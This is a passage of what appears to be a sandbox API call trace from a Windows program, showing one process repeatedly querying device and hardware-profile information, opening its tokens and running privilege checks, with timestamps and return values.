(in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.194] GetLastError () returned 0x578 [0085.194] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.194] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.194] GetCurrentThread () returned 0xfffffffe [0085.194] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.194] GetLastError () returned 0x3f0 [0085.194] GetCurrentProcess () returned 0xffffffff [0085.194] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.194] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.194] SetLastError (dwErrCode=0x522) [0085.195] CloseHandle (hObject=0x114) returned 1 [0085.195] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.195] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.195] GetLastError () returned 0x578 [0085.195] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.195] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.195] GetCurrentThread () returned 0xfffffffe [0085.195] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.195] GetLastError () returned 0x3f0 [0085.195] GetCurrentProcess () returned 0xffffffff [0085.195] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.195] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.195] SetLastError (dwErrCode=0x522) [0085.195] CloseHandle (hObject=0x114) returned 1 [0085.195] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.195] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.195] GetLastError () returned 0x578 [0085.195] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.195] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.195] GetCurrentThread () returned 0xfffffffe [0085.195] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.195] GetLastError () returned 0x3f0 [0085.195] GetCurrentProcess () returned 0xffffffff [0085.195] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.195] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.195] SetLastError (dwErrCode=0x522) [0085.195] CloseHandle (hObject=0x114) returned 1 [0085.195] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.195] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.195] GetLastError () returned 0x578 [0085.195] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.195] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.195] GetCurrentThread () returned 0xfffffffe [0085.195] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.195] GetLastError () returned 0x3f0 [0085.195] GetCurrentProcess () returned 0xffffffff [0085.196] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.196] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.196] SetLastError (dwErrCode=0x522) [0085.196] CloseHandle (hObject=0x114) returned 1 [0085.196] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.196] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.196] GetLastError () returned 0x578 [0085.196] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.196] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.196] GetCurrentThread () returned 0xfffffffe [0085.196] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.196] GetLastError () returned 0x3f0 [0085.196] GetCurrentProcess () returned 0xffffffff [0085.196] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.196] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.196] SetLastError (dwErrCode=0x522) [0085.196] CloseHandle (hObject=0x114) returned 1 [0085.196] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.196] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.196] GetLastError () returned 0x578 [0085.196] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.196] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.196] GetCurrentThread () returned 0xfffffffe [0085.196] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.196] GetLastError () returned 0x3f0 [0085.196] GetCurrentProcess () returned 0xffffffff [0085.196] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.196] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.196] SetLastError (dwErrCode=0x522) [0085.196] CloseHandle (hObject=0x114) returned 1 [0085.196] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.196] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.196] GetLastError () returned 0x578 [0085.196] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.196] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.196] GetCurrentThread () returned 0xfffffffe [0085.196] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.196] GetLastError () returned 0x3f0 [0085.197] GetCurrentProcess () returned 0xffffffff [0085.197] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.197] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.197] SetLastError (dwErrCode=0x522) [0085.197] CloseHandle (hObject=0x114) returned 1 [0085.197] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.197] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.197] GetLastError () returned 0x578 [0085.197] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.197] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.197] GetCurrentThread () returned 0xfffffffe [0085.197] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.197] GetLastError () returned 0x3f0 [0085.197] GetCurrentProcess () returned 0xffffffff [0085.197] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.197] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.197] SetLastError (dwErrCode=0x522) [0085.197] CloseHandle (hObject=0x114) returned 1 [0085.197] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.197] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.197] GetLastError () returned 0x578 [0085.197] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.197] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.197] GetCurrentThread () returned 0xfffffffe [0085.197] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.197] GetLastError () returned 0x3f0 [0085.197] GetCurrentProcess () returned 0xffffffff [0085.197] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.197] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.197] SetLastError (dwErrCode=0x522) [0085.197] CloseHandle (hObject=0x114) returned 1 [0085.197] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.197] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.197] GetLastError () returned 0x578 [0085.197] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.197] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.197] GetCurrentThread () returned 0xfffffffe [0085.197] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.198] GetLastError () returned 0x3f0 [0085.198] GetCurrentProcess () returned 0xffffffff [0085.198] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.198] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.198] SetLastError (dwErrCode=0x522) [0085.198] CloseHandle (hObject=0x114) returned 1 [0085.198] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.198] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.198] GetLastError () returned 0x578 [0085.198] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.198] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.198] GetCurrentThread () returned 0xfffffffe [0085.198] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.198] GetLastError () returned 0x3f0 [0085.198] GetCurrentProcess () returned 0xffffffff [0085.198] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.198] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.198] SetLastError (dwErrCode=0x522) [0085.198] CloseHandle (hObject=0x114) returned 1 [0085.198] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.198] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.198] GetLastError () returned 0x578 [0085.198] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.198] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.198] GetCurrentThread () returned 0xfffffffe [0085.198] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.198] GetLastError () returned 0x3f0 [0085.198] GetCurrentProcess () returned 0xffffffff [0085.198] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.198] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.198] SetLastError (dwErrCode=0x522) [0085.198] CloseHandle (hObject=0x114) returned 1 [0085.198] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.198] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.198] GetLastError () returned 0x578 [0085.198] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.198] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.198] GetCurrentThread () returned 0xfffffffe [0085.198] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.199] GetLastError () returned 0x3f0 [0085.199] GetCurrentProcess () returned 0xffffffff [0085.199] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.199] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.199] SetLastError (dwErrCode=0x522) [0085.199] CloseHandle (hObject=0x114) returned 1 [0085.199] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.199] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.199] GetLastError () returned 0x578 [0085.199] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.199] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.199] GetCurrentThread () returned 0xfffffffe [0085.199] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.199] GetLastError () returned 0x3f0 [0085.199] GetCurrentProcess () returned 0xffffffff [0085.199] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.199] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.199] SetLastError (dwErrCode=0x522) [0085.199] CloseHandle (hObject=0x114) returned 1 [0085.199] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.199] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.199] GetLastError () returned 0x578 [0085.199] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.199] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.199] GetCurrentThread () returned 0xfffffffe [0085.199] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.199] GetLastError () returned 0x3f0 [0085.199] GetCurrentProcess () returned 0xffffffff [0085.199] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.199] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.199] SetLastError (dwErrCode=0x522) [0085.199] CloseHandle (hObject=0x114) returned 1 [0085.199] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.199] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.199] GetLastError () returned 0x578 [0085.199] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.199] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.199] GetCurrentThread () returned 0xfffffffe [0085.200] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.200] GetLastError () returned 0x3f0 [0085.200] GetCurrentProcess () returned 0xffffffff [0085.200] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.200] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.200] SetLastError (dwErrCode=0x522) [0085.200] CloseHandle (hObject=0x114) returned 1 [0085.200] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.200] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.200] GetLastError () returned 0x578 [0085.200] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.200] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.200] GetCurrentThread () returned 0xfffffffe [0085.200] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.200] GetLastError () returned 0x3f0 [0085.200] GetCurrentProcess () returned 0xffffffff [0085.200] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.200] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.200] SetLastError (dwErrCode=0x522) [0085.200] CloseHandle (hObject=0x114) returned 1 [0085.200] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.200] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.200] GetLastError () returned 0x578 [0085.200] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.200] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.200] GetCurrentThread () returned 0xfffffffe [0085.200] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.200] GetLastError () returned 0x3f0 [0085.200] GetCurrentProcess () returned 0xffffffff [0085.200] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.200] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.200] SetLastError (dwErrCode=0x522) [0085.200] CloseHandle (hObject=0x114) returned 1 [0085.200] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.200] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.200] GetLastError () returned 0x578 [0085.200] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.200] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.201] GetCurrentThread () returned 0xfffffffe [0085.201] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.201] GetLastError () returned 0x3f0 [0085.201] GetCurrentProcess () returned 0xffffffff [0085.201] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.201] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.201] SetLastError (dwErrCode=0x522) [0085.201] CloseHandle (hObject=0x114) returned 1 [0085.201] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.201] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.201] GetLastError () returned 0x578 [0085.201] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.201] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.201] GetCurrentThread () returned 0xfffffffe [0085.201] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.201] GetLastError () returned 0x3f0 [0085.201] GetCurrentProcess () returned 0xffffffff [0085.201] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.201] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.201] SetLastError (dwErrCode=0x522) [0085.201] CloseHandle (hObject=0x114) returned 1 [0085.201] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.201] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.201] GetLastError () returned 0x578 [0085.201] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.201] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.201] GetCurrentThread () returned 0xfffffffe [0085.201] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.201] GetLastError () returned 0x3f0 [0085.201] GetCurrentProcess () returned 0xffffffff [0085.201] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.201] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.201] SetLastError (dwErrCode=0x522) [0085.201] CloseHandle (hObject=0x114) returned 1 [0085.201] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.201] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.201] GetLastError () returned 0x578 [0085.201] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.201] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.202] GetCurrentThread () returned 0xfffffffe [0085.202] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.202] GetLastError () returned 0x3f0 [0085.202] GetCurrentProcess () returned 0xffffffff [0085.202] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.202] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.202] SetLastError (dwErrCode=0x522) [0085.202] CloseHandle (hObject=0x114) returned 1 [0085.202] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 